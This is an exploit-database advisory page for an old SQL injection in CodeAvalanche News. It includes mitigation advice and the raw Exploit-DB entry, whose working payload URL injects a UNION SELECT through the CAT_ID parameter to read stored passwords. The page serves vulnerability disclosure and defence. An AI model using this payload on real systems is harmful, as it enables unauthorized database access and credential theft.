header-logo
Suggest Exploit
vendor:
CodeAvalanche News
by:
beks
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: CodeAvalanche News
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

CodeAvalanche News SQL Injection

The vulnerability allows an attacker to execute arbitrary SQL queries in the CodeAvalanche News software by injecting malicious code through the 'CAT_ID' parameter in the 'inc_listnews.asp' script. This can lead to unauthorized access, data theft, and potentially full control of the application and underlying database.

Mitigation:

The vendor should sanitize user input and use parameterized queries to prevent SQL Injection attacks. Additionally, regularly updating the software to the latest version is recommended.
Source

Exploit-DB raw data:

#CodeAvalanche News SQL Injection#

Software: CodeAvalanche News

Download: http://www.aspindir.com/indir.asp?id=3315

Risk: High

Found by: beks

http://target/[path]/inc_listnews.asp?CAT_ID=17+union+select+0,0,0,0,Password+from+Params

# milw0rm.com [2007-02-15]

Navigation

Suggest Exploit

Services By CQR